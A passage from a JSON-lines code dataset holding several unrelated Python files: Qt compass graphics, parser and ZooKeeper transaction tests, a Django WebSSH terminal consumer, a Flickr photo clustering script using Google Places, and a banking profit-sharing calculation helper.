self.item.setScale(PRECISION_FACTOR)\r\n self.item2.setBrush(AC_BRUSH)\r\n self.addToGroup(self.item2)\r\n self.addToGroup(self.item)\r\n\r\n def update_position(self, x, y):\r\n x, y = resize(x), resize(y)\r\n self.item.setPos(x-51/2, y-51/2) # l'image est de taille 51x51 pixels\r\n\r\n\r\nclass QGraphicsRoseItem(QtWidgets.QGraphicsItemGroup):\r\n \"\"\"Cette classe groupe tous les items composant le compas\"\"\"\r\n def __init__(self, sim, x, y, width, parent, view):\r\n self.x, self.y, self.w = x, y, width\r\n self.centre = (self.x + self.w / 2, self.y + self.w / 2)\r\n super().__init__(None)\r\n self.view = view\r\n self.parent = parent\r\n self.sim = sim\r\n\r\n font = QFont()\r\n font_metric = QFontMetrics(font)\r\n font.setWeight(TEXT_SIZE)\r\n for i in range(12): # création de la rose\r\n i = i / RAD2DEG * 30\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2 + np.sin(i) * (LARGE_GRAD_LONG + 2.3 * TEXT_SIZE)\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2 + np.cos(i) * (LARGE_GRAD_LONG + 2.3 * TEXT_SIZE)\r\n hdg = QtWidgets.QGraphicsTextItem(self.parent)\r\n hdg.setFont(font)\r\n hdg.setTransform(self.view.transform())\r\n heading = round(i * RAD2DEG / 10)\r\n hdg.setPlainText(str(heading))\r\n hdg.setRotation(heading * 10)\r\n hdg.setPos(a_x, a_y)\r\n text_width = font_metric.width(str(round(i * RAD2DEG / 10)))\r\n hdg.moveBy(-np.cos(i) * text_width / 1.2, np.sin(i) * text_width / 1.2)\r\n hdg.setDefaultTextColor(white)\r\n self.addToGroup(hdg)\r\n\r\n def paint(self, painter=QPainter(), style=None, widget=None):\r\n painter.setPen(ROSE_PEN)\r\n\r\n # Large graduations\r\n for i in range(36):\r\n i = i / RAD2DEG * 10\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2\r\n b_x = a_x + np.sin(i) * LARGE_GRAD_LONG\r\n b_y = a_y + np.cos(i) * LARGE_GRAD_LONG\r\n l = painter.drawLine(a_x, a_y, b_x, b_y)\r\n self.addToGroup(l)\r\n\r\n # Small graduations\r\n for i in range(1, 72, 2):\r\n i = i / RAD2DEG * 5\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2\r\n b_x = a_x + np.sin(i) * LARGE_GRAD_LONG / 2\r\n b_y = a_y + np.cos(i) * LARGE_GRAD_LONG / 2\r\n s = painter.drawLine(a_x, a_y, b_x, b_y)\r\n self.addToGroup(s)\r\n\r\n e = painter.drawEllipse(self.x, self.y, self.w, self.w)\r\n self.addToGroup(e)\r\n\r\n if self.sim.mode == \"SelectedHeading\": # affichage du heading selecté par un trait partant de l'avion si mode\r\n # sélecté\r\n a_x2 = self.centre[0] + np.sin(float(self.sim.HDG_selected)/RAD2DEG)*self.w / 2\r\n a_y2 = self.centre[1] + np.cos(float(self.sim.HDG_selected)/RAD2DEG) * self.w / 2\r\n b_x2 = self.centre[0]\r\n b_y2 = self.centre[1]\r\n self.line = painter.drawLine(a_x2, a_y2, b_x2, b_y2)\r\n self.addToGroup(self.line)\r\n","sub_path":"graphicsItems.py","file_name":"graphicsItems.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527716782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport datetime\n\nfrom sgeparse.parser import JobsParser\n\n\n@pytest.fixture\ndef parser(data):\n with open(data) as infile:\n return JobsParser(infile.read())\n\n\ndef test_parse_testdata(parser):\n assert parser.njobs > 5\n\n\ndef test_first_job(parser):\n assert parser.jobs[0] == {\n 'job_number': 1031650,\n 'priority': 0.60500,\n 'name': 'k2_3b802-20150513',\n 'owner': 'sw',\n 'state': 'r',\n 'start_time': datetime.datetime(2015, 5, 15, 13, 38, 8),\n 'queue': 'parallel',\n 'host': 'ngts08.local',\n 'slots': 12,\n }\n","sub_path":"testing/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"305812262","text":"import threading\nimport unittest\n\nfrom kazoo.exceptions import BadVersionError\n\nfrom pykit import rangeset\nfrom pykit import threadutil\nfrom pykit import ututil\nfrom pykit import zktx\nfrom pykit.zktx import COMMITTED\nfrom pykit.zktx import PURGED\nfrom pykit.zktx import STATUS\n\ndd = ututil.dd\n\nzk_tag = 'daocloud.io/zookeeper:3.4.10'\nzk_name = 'zk_test'\n\n\nclass PseudoKVAccessor(dict):\n\n def __init__(self, *args, **kwargs):\n\n super(PseudoKVAccessor, self).__init__(*args, **kwargs)\n\n self.lock = threading.RLock()\n\n def get(self, key):\n\n with self.lock:\n return super(PseudoKVAccessor, self).get(key)\n\n def set(self, key, value, version):\n\n with self.lock:\n\n prev = self[key]\n if prev[1] != version:\n raise BadVersionError()\n\n self[key] = (value, version+1)\n\n def set_or_create(self, key, value, version):\n\n with self.lock:\n\n if key in self:\n return self.set(key, value, version)\n else:\n if version == -1:\n self[key] = (value, 0)\n else:\n raise BadVersionError()\n\n def safe_delete(self, key, version=None):\n # for test of purge\n pass\n\n\nclass TxidsetAccessor(object):\n def __init__(self):\n self.lock = threading.RLock()\n self.ver = 0\n self.d = {}\n\n def get(self):\n with self.lock:\n for k in self.d:\n self.d[k] = rangeset.RangeSet(self.d[k])\n\n return self.d, self.ver\n\n def set(self, value, version=None):\n with self.lock:\n if version is not None and version != self.ver:\n raise BadVersionError()\n\n self.d = value\n self.ver = version + 1\n\n def set_or_create(self, key, value, version):\n return self.set(value, version)\n\n\nclass PseudoStorage(zktx.StorageHelper):\n\n conflicterror = BadVersionError\n\n def __init__(self):\n self.record = PseudoKVAccessor({\n 'foo': ([[1, 1], [17, 17]], 0),\n 'bar': ([[-1, None]], 1),\n })\n\n self.txidset = TxidsetAccessor()\n\n self.journal = PseudoKVAccessor({})\n\n\nclass TestTXStorageHelper(unittest.TestCase):\n\n def setUp(self):\n self.sto = PseudoStorage()\n\n def test_get_latest(self):\n\n rst = self.sto.record.get('foo')\n self.assertEqual(([[1, 1], [17, 17]], 0), rst)\n\n rst = self.sto.record.get('bar')\n self.assertEqual(([[-1, None]], 1), rst)\n\n def test_apply_record(self):\n\n cases = (\n (0, 'foo', 'fooval', (None, 0), '<=max txid'),\n (1, 'foo', 'fooval', (1, 0), '<=max txid'),\n (16, 'foo', 'fooval', (None, 0), '<=max txid'),\n (17, 'foo', 'fooval', (17, 0), '<=max txid'),\n (18, 'foo', 'fooval', ('fooval', 1), '>max txid'),\n (1, 'bar', 'barval', ('barval', 2), '>max txid'),\n (1, 'bar', 'barval', ('barval', 2), '<=max txid'),\n )\n\n for txid, key, value, expected, mes in cases:\n\n dd(txid, key, value, expected, mes)\n\n self.sto.apply_record(txid, key, value)\n\n rec, ver = self.sto.record.get(key)\n val_of_txid = dict(rec).get(txid)\n self.assertEqual(expected, (val_of_txid, ver))\n\n def test_apply_record_max_history(self):\n\n s, e = 100, 150\n for txid in range(s, e):\n self.sto.apply_record(txid, 'foo', txid)\n\n rec, ver = self.sto.record.get('foo')\n self.assertEqual(e-s, ver)\n self.assertEqual(self.sto.max_value_history, len(rec))\n\n def test_apply_record_concurrently(self):\n\n n_thread = 10\n n_repeat = 100\n\n self.sto.max_value_history = n_thread * n_repeat + 1\n\n l = threading.RLock()\n sess = {'txid': 0}\n success_tx = {-1: True}\n\n def _apply(ithread):\n for ii in range(n_repeat):\n\n with l:\n sess['txid'] += 1\n txid = sess['txid']\n\n if self.sto.apply_record(txid, 'bar', txid):\n with l:\n success_tx[txid] = True\n\n ths = [threadutil.start_daemon(_apply, args=(ii, ))\n for ii in range(n_thread)]\n\n for th in ths:\n th.join()\n\n rec, ver = self.sto.record.get('bar')\n dd(len(rec))\n dd(ver)\n\n self.assertEqual(set(success_tx.keys()),\n set([x[0] for x in rec]))\n\n rec, ver = self.sto.record.get('bar')\n dd(rec, ver)\n\n self.assertLessEqual(ver, 1+n_thread*n_repeat)\n self.assertEqual(n_thread*n_repeat, rec[-1][0])\n self.assertEqual(n_thread*n_repeat, rec[-1][1])\n\n def _rand_txids(self):\n for ii in range(100):\n txid = int(ii % 53 * 1.3)\n yield txid\n\n def test_add_to_txidset(self):\n\n self.assertRaises(KeyError, self.sto.add_to_txidset, 'foo', 1)\n\n expected = {txid: True\n for txid in self._rand_txids()}\n\n for status in STATUS:\n for txid in self._rand_txids():\n self.sto.add_to_txidset(status, txid)\n\n dd(sorted(expected.keys()))\n\n rst, ver = self.sto.txidset.get()\n dd(rst[status])\n\n for txid in expected:\n self.assertTrue(rst[status].has(txid))\n\n for txid in range(100):\n if txid not in expected:\n self.assertFalse(rst[status].has(txid))\n\n def test_add_to_txidset_concurrent(self):\n\n expected = {txid: True\n for txid in self._rand_txids()}\n\n n_thread = 2\n status = COMMITTED\n\n def _add():\n for txid in self._rand_txids():\n self.sto.add_to_txidset(status, txid)\n\n for th in [threadutil.start_daemon(_add)\n for _ in range(n_thread)]:\n\n th.join()\n\n rst, ver = self.sto.txidset.get()\n dd(rst[status])\n\n for txid in expected:\n self.assertTrue(rst[status].has(txid))\n\n for txid in range(100):\n if txid not in expected:\n self.assertFalse(rst[status].has(txid))\n\n def test_purge(self):\n\n self.sto.max_journal_history = 5\n\n cases = (\n (\n {PURGED: [], COMMITTED: [[1, 100]]},\n {PURGED: [[1, 95]], COMMITTED: [[95, 100]]},\n ),\n # with unknown txid 10\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 20]]},\n {PURGED: [[1, 10], [11, 15]], COMMITTED: [[15, 20]]},\n ),\n # no need to purge\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 15]]},\n {PURGED: [[1, 10]], COMMITTED: [[11, 15]]},\n ),\n (\n {PURGED: [[1, 10]], COMMITTED: [[11, 14], [15, 18]]},\n {PURGED: [[1, 10], [11, 12]], COMMITTED: [[12, 14], [15, 18]]},\n ),\n )\n\n for inp, expected in cases:\n inp = {k: rangeset.RangeSet(v) for k, v in inp.items()}\n self.sto.purge(inp)\n self.assertEqual(expected, inp)\n","sub_path":"zktx/test/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388605864","text":"# -*- coding:utf-8 -*-\r\nfrom channels.generic.websocket import WebsocketConsumer\r\nfrom django.utils.timezone import now\r\ntry:\r\n from django.utils.encoding import smart_unicode\r\nexcept ImportError:\r\n from django.utils.encoding import smart_text as smart_unicode\r\n\r\nimport time\r\nimport socket\r\nimport uuid\r\nimport traceback\r\nimport json\r\nimport paramiko\r\nimport io\r\n\r\nfrom terminal.models import SessionLog\r\nfrom .utils import get_redis_instance, SshTerminalThread, InterActiveShellThread, channel_layer\r\nfrom control.models import AgentAdmin\r\nfrom control.utils.esb_api import EsbApi\r\nfrom control.utils.encryption import PasswordEncryption\r\n\r\n\r\n# for webterminal \r\nclass WebSSH(WebsocketConsumer):\r\n ssh = paramiko.SSHClient()\r\n http_user = True\r\n channel_session = True\r\n channel_session_user = True\r\n first_flag = True\r\n\r\n def get_cookie(self):\r\n cookie = None\r\n for a in self.scope['headers']:\r\n if a[0] == b'cookie':\r\n cookie = a[1].decode()\r\n break\r\n if cookie:\r\n cookie = dict([x.split('=',1) for x in cookie.split('&')])\r\n return cookie\r\n\r\n def close_connect(self, text):\r\n self.send(text_data=text)\r\n self.close()\r\n return\r\n\r\n def connect(self, *args, **kwargs):\r\n self.wait_time = time.time()\r\n self.accept()\r\n # self.opt_username = self.get_user(self.scope)\r\n token = self.scope.get('cookies').get(\"bk_token\")\r\n bk_user = EsbApi(token).get_user_info() # 获取当前用户\r\n self.opt_username = bk_user.get(\"username\")\r\n self.protocol = None\r\n self.server_id = self.scope['url_route']['kwargs'].get('server_id')\r\n query_string = self.scope['query_string'].decode()\r\n if query_string:\r\n query_dict = dict([x.split('=',1) for x in query_string.split('&')])\r\n width = int(float(query_dict[\"width\"]))\r\n height = int(float(query_dict[\"height\"]))\r\n password = None\r\n pri_key = None\r\n ssh_key_id = None\r\n session_uuid = None\r\n # if query_dict.get(\"ip\"):\r\n # self.hostname = query_dict[\"ip\"]\r\n # port = query_dict.get(\"port\")\r\n # self.username = query_dict.get(\"username\")\r\n # system_type = query_dict.get(\"system_type\")\r\n # session_uuid = query_dict.get(\"session_uuid\")\r\n # ssh_key_id = query_dict.get(\"ssh_key\")\r\n # password = query_dict.get(\"password\")\r\n if self.server_id:\r\n if AgentAdmin.objects.filter(id=self.server_id).count() == 0:\r\n self.close_connect(\"{'opsany_ssh_error':'主机不存在!'}\")\r\n else:\r\n session_uuid = query_dict.get(\"session_uuid\")\r\n host_obj = AgentAdmin.objects.get(id=int(self.server_id))\r\n system_type = host_obj.system_type\r\n ssh_key_id = host_obj.ssh_key_id\r\n self.hostname = host_obj.ip\r\n port = host_obj.ssh_port\r\n self.username = host_obj.username\r\n password = PasswordEncryption().decrypt(host_obj.password) if host_obj.password and host_obj.ssh_type == \"password\" else \"\"\r\n else:\r\n self.close_connect(\"{'opsany_ssh_error':'请添加主机信息'}\")\r\n if system_type.strip() == \"Linux\":\r\n self.protocol = \"ssh\"\r\n else:\r\n self.close_connect(\"{'opsany_ssh_error':'system_type必须为Linux!'}\")\r\n try:\r\n if ssh_key_id:\r\n cookies = self.scope[\"cookies\"]\r\n if not cookies or not cookies.get(\"bk_token\"):\r\n self.close_connect(\"{'opsany_ssh_error':'未找到cookie或bk_token!'}\")\r\n bk_token = cookies.get(\"bk_token\")\r\n esb_obj = EsbApi(bk_token)\r\n res = esb_obj.get_user_ssh_key(str(ssh_key_id))\r\n if not res:\r\n self.close_connect(\"{'opsany_ssh_error':'无法获取到ssh_key!'}\")\r\n pri_key_ = res.get('private_key')\r\n pri_key = io.StringIO(pri_key_)\r\n pri_key = paramiko.RSAKey.from_private_key(pri_key)\r\n if not (pri_key or password):\r\n self.close_connect(\"{'opsany_ssh_error':'请提供登录验证密码或秘钥!'}\")\r\n if session_uuid:\r\n log_name = session_uuid\r\n else:\r\n log_name = str(uuid.uuid4())\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n self.ssh.connect(\r\n self.hostname,\r\n port=port,\r\n username=self.username,\r\n password=password,\r\n pkey=pri_key,\r\n timeout=3\r\n )\r\n self.session_log = SessionLog.objects.create(user=self.opt_username, server=host_obj, channel=self.channel_name,\r\n log_name=log_name)\r\n except socket.timeout:\r\n self.close_connect(\"{'opsany_ssh_error':'连接服务器超时!'}\")\r\n except Exception as e:\r\n self.close_connect(\"{'opsany_ssh_error':'SSH验证失败!'}\")\r\n chan = self.ssh.invoke_shell(width=width, height=height, term='xterm')\r\n sshterminal = SshTerminalThread(self, chan, self.opt_username)\r\n sshterminal.setDaemon = True\r\n sshterminal.start()\r\n log_name = log_name + '.log'\r\n interactivessh = InterActiveShellThread(chan, self, log_name=log_name, width=width, height=height)\r\n interactivessh.setDaemon = True\r\n interactivessh.start()\r\n\r\n def disconnect(self, close_code):\r\n self.closessh()\r\n time.sleep(3)\r\n audit_log = SessionLog.objects.filter(channel=self.channel_name)\r\n if audit_log:\r\n audit_log.update(is_finished=True, end_time = now())\r\n self.close()\r\n\r\n @property\r\n def queue(self):\r\n queue = get_redis_instance()\r\n queue.pubsub()\r\n return queue\r\n\r\n def closessh(self):\r\n self.queue.publish(self.channel_name, json.dumps(['close']))\r\n\r\n def receive(self, text_data=None, bytes_data=None, **kwargs):\r\n try:\r\n if text_data is not None:\r\n data = json.loads(text_data)\r\n begin_time = time.time()\r\n if isinstance(data, list) and data[0] == 'username':\r\n self.username = data[1]\r\n elif isinstance(data, list) and data[0] == 'ip' and (len(data) == 5 or len(data) == 6):\r\n ip = data[1]\r\n width = data[2]\r\n height = data[3]\r\n session_uuid = data[4]\r\n self.hostname = ip\r\n try:\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n server = AgentAdmin.objects.get(ip=ip)\r\n port = server.ssh_port\r\n if len(data) == 6:\r\n port = data[5]\r\n self.ssh.connect(ip, port=port, username=server.username, password=server.password, timeout=3)\r\n if len(session_uuid) == 36:\r\n log_name = session_uuid\r\n else:\r\n log_name = str(uuid.uuid4())\r\n SessionLog.objects.create(user=self.opt_username, server=server, channel=self.channel_name,\r\n log_name=log_name)\r\n except socket.timeout:\r\n self.send(text_data=\"Can not connect to server, timeout!\")\r\n self.disconnect(1000)\r\n return\r\n except Exception as e:\r\n self.send(text_data=\"Can not connect to server, Authentication failed.\")\r\n self.disconnect(1000)\r\n return\r\n ssh_chan = self.ssh.invoke_shell(width=width, height=height, term='xterm')\r\n sshterminal = SshTerminalThread(self, ssh_chan, self.opt_username)\r\n sshterminal.setDaemon = True\r\n sshterminal.start()\r\n log_name = log_name + '.log'\r\n interactivessh = InterActiveShellThread(ssh_chan, self, log_name=log_name, width=width, height=height)\r\n interactivessh.setDaemon = True\r\n interactivessh.start()\r\n elif isinstance(data, list) and data[0] in ['stdin', 'stdout']:\r\n self.queue.publish(self.channel_name, json.loads(text_data)[1])\r\n elif isinstance(data, list) and data[0] == u'set_size':\r\n self.queue.publish(self.channel_name, text_data)\r\n elif isinstance(data, list) and data[0] == u'close':\r\n self.disconnect(1000)\r\n return\r\n else:\r\n self.queue.publish(self.channel_name, text_data)\r\n elif bytes_data:\r\n self.queue.publish(self.channel_name, bytes_data)\r\n except socket.error:\r\n self.disconnect(1000)\r\n return\r\n except ValueError:\r\n if self.first_flag:\r\n self.first_flag = False\r\n self.queue.publish(self.channel_name, smart_unicode(text_data))\r\n except Exception as e:\r\n self.disconnect(1000)\r\n return\r\n","sub_path":"paas-ce/websocket/terminal/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475034950","text":"import numpy as np\nimport csv, pprint\nimport json\nimport requests # http://docs.python-requests.org/en/master/user/quickstart/#make-a-request\n\nimport keys\n\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\n\n#columns = ['id', 'user', 'latitude', 'longitude', 'hashtags', 'url']\n\nAPI_URL = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json'\nPHOTO_URL = 'https://maps.googleapis.com/maps/api/place/photo?sensor={sensor}&key={key}&photoreference={photoreference}&maxheight={maxheight}&maxwidth={maxwidth}'\nDEFAULT_PARAMS = dict(sensor='false', key=keys.google_api_key)\n\ncsvfile = 'flickr_data.csv'\noutfile = 'output.csv'\ncluster_details = {}\ncluster_tags = {}\npp = pprint.PrettyPrinter()\n\nX = np.loadtxt(csvfile, delimiter=',', usecols=(2,3))\nbandwidth = estimate_bandwidth(X, quantile=0.0005, n_samples=10000)\n\n\t\t\t\t### \tCLUSTERING - MEANSHIFT \t\t###\n\nclustering = MeanShift(bandwidth=bandwidth, bin_seeding=True, cluster_all=False, min_bin_freq=10)\nclustering.fit(X)\nlabels = clustering.labels_\ncluster_centers = clustering.cluster_centers_\n\nfor label in labels: \n\ttry:\n\t\tif label in cluster_details:\n\t\t\tcontinue\n\t\telse: \n\t\t\tcluster_details[label] = cluster_centers[label] # Store cluster ID and centre point together\n\texcept IndexError:\n\t\tcontinue\npp.pprint(cluster_details)\n\n\t\t######################################################\n\n\t\t###\t\tADDING CLUSTER ID TO EACH PHOTO IN DATA FILE\t###\ni = 0\nwith open(csvfile, \"r+\") as infile:\n\treader = csv.reader(infile)\n\n\twith open(outfile, \"w\", newline='') as outfile:\n\t\twriter = csv.writer(outfile)\n\t\t\n\t\tfor row in reader:\n\t\t\tcluster_id = labels[i]\n\t\t\trow.append(cluster_id)\n\t\t\twriter.writerow(row)\n\t\t\ti += 1\n\t\t\t\t#print(cluster_id)\n\n\toutfile.close()\ninfile.close()\n\n# Writing Clusters to file\n'''\nwith open(\"dublin_clusters.csv\", \"r+\") as csvfile:\n\twriter = csv.writer(csvfile)\n\twriter.writerow([cluster_centers, \"\\n\"])\n\ncsvfile.close()\n'''\n#print(cluster_centers)\n'''\nlabels_unique = np.unique(l for l in labels if l != -1)\nn_clusters_ = len(labels_unique)\n\ncluster_count = df[df['cluster'] != -1].groupby('cluster').size()\n'''\ndef popularTags(): # Find the tags that are most frequently used in each cluster\n\tcluster_count = 0\n\tclusters = {}\n\twith open('output.csv', 'r') as csvfile:\n\t\tcontent = csv.reader(csvfile)\n\t\tfor line in content:\n\t\t\tphoto = line[0]\n\t\t\tuser = line[1]\n\t\t\tlatitude = line[2]\n\t\t\tlongitude = line[3]\n\t\t\ttags = line[4]\n\t\t\turl = line[5]\n\t\t\tcluster = line[6]\t\n\n\t\t\tif cluster != '-1':\t\n\n\t\t\t\tif cluster in clusters:\n\t\t\t\t\tclusters[cluster] = clusters[cluster] + tags\n\t\t\t\telse:\n\t\t\t\t\tclusters[cluster] = {}\n\t\t\t\t\tcluster_count += 1\n\t\t\t\t\tclusters[cluster] = tags\n\tfor i in range(0, cluster_count):\n\t\twords \t\t\t= str(clusters[str(i)])\n\t\tclean_words \t= words.replace(\"b'\", \" \") # Clean the data\n\t\tcleaning_words\t= clean_words.replace(\"'\", \" \") # Clean the data\n\t\tcleaned_words\t= cleaning_words.replace(\"''\", \" \") # Clean the data\n\t\twords_split\t\t= cleaned_words.split()\n\t\tword_counter \t= {}\n\t\tfor word in words_split:\n\t\t if word in word_counter:\n\t\t word_counter[word] += 1\n\t\t else:\n\t\t word_counter[word] = 1\n\t\tpopular_words = sorted(word_counter, key = word_counter.get, reverse = True)\n\t\t#print(popular_words[:10])\n\t\tcluster_tags[str(i)] = popular_words[:10]\n\t\t#print(cluster_tags[str(i)])\n\ndef googleNearbyPlaces(lat, lng, rankby='distance', type='point_of_interest'):\n\n\tparams = dict(DEFAULT_PARAMS)\n\tparams['location'] \t= '{},{}'.format(lat, lng)\n\tparams['rankby'] \t= rankby\n\tparams['type'] \t\t= type\n\tresponse = requests.get(API_URL, params=params)\n\tdata \t= json.loads(response.text)['results']\n\tfor p_data in data:\n\t\tif not 'photos' in p_data:\n\t\t\tcontinue\n\t\tphoto_params = dict(DEFAULT_PARAMS)\n\t\tphoto_params.update(dict(photoreference=p_data['photos'][0]['photo_reference'], maxheight=400, maxwidth=700))\n\t\tp_data['main_photo'] = PHOTO_URL.format(**photo_params)\n\treturn data\n#for place in googleNearbyPlaces(53.34465732, -6.26666065):\n\t#pp.pprint(place['name'])\n\t#pp.pprint(place)\n#\tprint('-'*20)\n\npopularTags()\n#pp.pprint(cluster_tags)\n\ndef writeInfoToFile():\n\tfor cluster in cluster_details:\n\t\tif cluster != -1:\n\t\t\tprint(cluster)\n\t\t\tprint(cluster_details[cluster])\n\t\t\tprint(cluster_tags[str(cluster)])\n\t\t\tfor place in googleNearbyPlaces(cluster_details[cluster][0], cluster_details[cluster][1]):\n\t\t\t\tpp.pprint(place['name'].encode(\"utf-8\"))\n\t\telse:\n\t \t\tcontinue\nwriteInfoToFile()","sub_path":"ms_cluster.py","file_name":"ms_cluster.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89084544","text":"import com.ihsan.foundation.mobject as mobject\r\nimport com.ihsan.foundation.pobject as pobject\r\nimport string\r\nimport com.ihsan.lib.trace as trace\r\n\r\n#GLOBALS\r\nEPSILON = 0.00001\r\n#HEAD_TOTAL_M = ['220', '215', '225']\r\n\r\nclass HI1000_Helper(mobject.MObject):\r\n \r\n def mobject_init(self):\r\n self.account_helper = self.Helper.CreateObject('AccountHelper')\r\n \r\n period_helper = self.Helper.CreateObject('PeriodHelper')\r\n today = period_helper.GetCurrentDate()\r\n self.p_year = today.fl_accountingyear\r\n self.p_month = today.fl_accountingperiode\r\n \r\n # preparing vars...\r\n self._vars = {}\r\n self._varfuncs = {\r\n 'total_pdp' : self.__f_total_pdp, # hitung total pendapatan rupiah\r\n 'total_pdpv' : self.__f_total_pdpv, # hitung total pendapatan dolar\r\n 'total_m' : self.__f_total_m, # hitung total dpk\r\n 'total_mv' : self.__f_total_mv, # hitung total dpk dolar\r\n 'total_r' : self.__f_total_r,\r\n 'total_v' : self.__f_total_v,\r\n 'invest_r' : self.__f_invest_r,\r\n 'invest_v' : self.__f_invest_v,\r\n 'total_pby_r': self.__f_total_pby_r,\r\n 'total_pby_v': self.__f_total_pby_v,\r\n 'total_sbu_r': self.__f_total_sbu_r,\r\n 'total_sbu_v': self.__f_total_sbu_v,\r\n 'a_tot_ppyr' : self.__f_a_total_ppyr,\r\n 'a_tot_ppyv' : self.__f_a_total_ppyv,\r\n 'koreksi_r' : self.__f_koreksi_r,\r\n 'koreksi_v' : self.__f_koreksi_v,\r\n 'total_aktr' : self.__f_total_aktr,\r\n 'total_pasr' : self.__f_total_pasr,\r\n 'total_aktd' : self.__f_total_aktd,\r\n 'total_pasd' : self.__f_total_pasd,\r\n 'total_ppyr' : self.__f_total_ppyr,\r\n 'total_ppyv' : self.__f_total_ppyv,\r\n 'total_psbr' : self.__f_total_psbr,\r\n 'total_psbv' : self.__f_total_psbv,\r\n 'ekiv_aktv' : self.__f_ekiv_aktv,\r\n 'ekiv_pasv' : self.__f_ekiv_pasv,\r\n 'ekiv_aktd' : self.__f_ekiv_aktd,\r\n 'ekiv_pasd' : self.__f_ekiv_pasd \r\n }\r\n \r\n def Hitung_HIPermil(self):\r\n permil_r = self.Helper.CreatePObject('HI_Permil', '000')\r\n permil_v = self.Helper.CreatePObject('HI_Permil', '411')\r\n \r\n #import rpdb2; rpdb2.start_embedded_debugger(\"01\", True, True)\r\n #trace.udp_trace(\"start hitung hi permil r\", \"192.168.1.8\")\r\n total_pdp = self.GetVar('total_pdp') \r\n total_m = self.GetVar('total_m')\r\n if total_m < EPSILON:\r\n permil_r_amt = 0.0\r\n else:\r\n permil_r_amt = total_pdp / (total_m * 1000)\r\n permil_r.amount = permil_r_amt\r\n total_pdpv = self.GetVar('total_pdpv') \r\n total_mv = self.GetVar('total_mv')\r\n if total_mv < EPSILON:\r\n permil_v_amt = 0.0\r\n else:\r\n permil_v_amt = total_pdpv / (total_mv * 1000)\r\n permil_v.amount = permil_v_amt \r\n \r\n def GetVar(self, var_name):\r\n if self._vars.has_key(var_name):\r\n return self._vars[var_name]\r\n else:\r\n val = self._varfuncs[var_name]() \r\n self._vars[var_name] = val\r\n \r\n return val \r\n \r\n def __f_total_pdp(self):\r\n total = self.GetVar('total_r')\r\n invest = self.GetVar('invest_r')\r\n a_tot_ppy = self.GetVar('a_tot_ppyr')\r\n koreksi = self.GetVar('koreksi_r')\r\n \r\n if total <= invest:\r\n if invest <= 0.00001:\r\n total_pdp = 0.0\r\n else:\r\n total_pdp = (total / invest) * (a_tot_ppy + koreksi)\r\n else:\r\n total_pdp = a_tot_ppy + koreksi\r\n\r\n return total_pdp\r\n \r\n def __f_total_pdpv(self):\r\n total = self.GetVar('total_v')\r\n invest = self.GetVar('invest_v')\r\n a_tot_ppy = self.GetVar('a_tot_ppyv')\r\n koreksi = self.GetVar('koreksi_v')\r\n \r\n if total <= invest:\r\n if invest == 0.0:\r\n total_pdp = 0.0\r\n else:\r\n total_pdp = (total / invest) * (a_tot_ppy + koreksi)\r\n else:\r\n total_pdp = a_tot_ppy + koreksi\r\n \r\n return total_pdp\r\n \r\n def __f_total_m(self):\r\n account_heads = self.Helper.GetObject('Parameter', 'DPK_HEAD'\r\n ).ParameterStringValue.split(',')\r\n total_m = 0\r\n for account_head in account_heads:\r\n total_m += self.account_helper.GetAvgBalance_Head(\r\n account_head,\r\n '000'\r\n )\r\n \r\n return total_m\r\n \r\n def __f_total_mv(self):\r\n account_heads = self.Helper.GetObject('Parameter', 'DPK_HEAD'\r\n ).ParameterStringValue.split(',')\r\n total_m = 0\r\n for account_head in account_heads:\r\n total_m += self.account_helper.GetAvgBalance_Head(\r\n account_head,\r\n '411'\r\n )\r\n \r\n return total_m\r\n \r\n def __f_total_r(self):\r\n total_m = self.GetVar('total_m')\r\n gwm = self.Helper.GetObject('Parameter', 'GWM_RUPIAH').ParameterValue\r\n total_r = total_m - (gwm/100 * total_m)\r\n \r\n return total_r\r\n \r\n def __f_total_v(self):\r\n total_m = self.GetVar('total_mv')\r\n gwm = self.Helper.GetObject('Parameter', 'GWM_VALAS').ParameterValue\r\n total_v = total_m - (gwm/100 * total_m)\r\n \r\n return total_v\r\n \r\n def __f_invest_r(self):\r\n invest = self.GetVar('total_pby_r') + self.GetVar('total_sbu_r')\r\n \r\n return invest\r\n \r\n def __f_invest_v(self):\r\n invest = self.GetVar('total_pby_v') + self.GetVar('total_sbu_v')\r\n \r\n return invest\r\n \r\n def __f_total_pby_r(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_PBY', '000')\r\n \r\n def __f_total_pby_v(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_PBY', '411')\r\n \r\n def __f_total_sbu_r(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_SBPU', '000')\r\n \r\n def __f_total_sbu_v(self):\r\n return self.account_helper.GetAvgBalance_Intf('AVG_SBPU', '411')\r\n \r\n def __f_a_total_ppyr(self):\r\n total_aktr = self.GetVar('total_aktr')\r\n total_pasr = self.GetVar('total_pasr')\r\n total_aktd = self.GetVar('total_aktd')\r\n total_pasd = 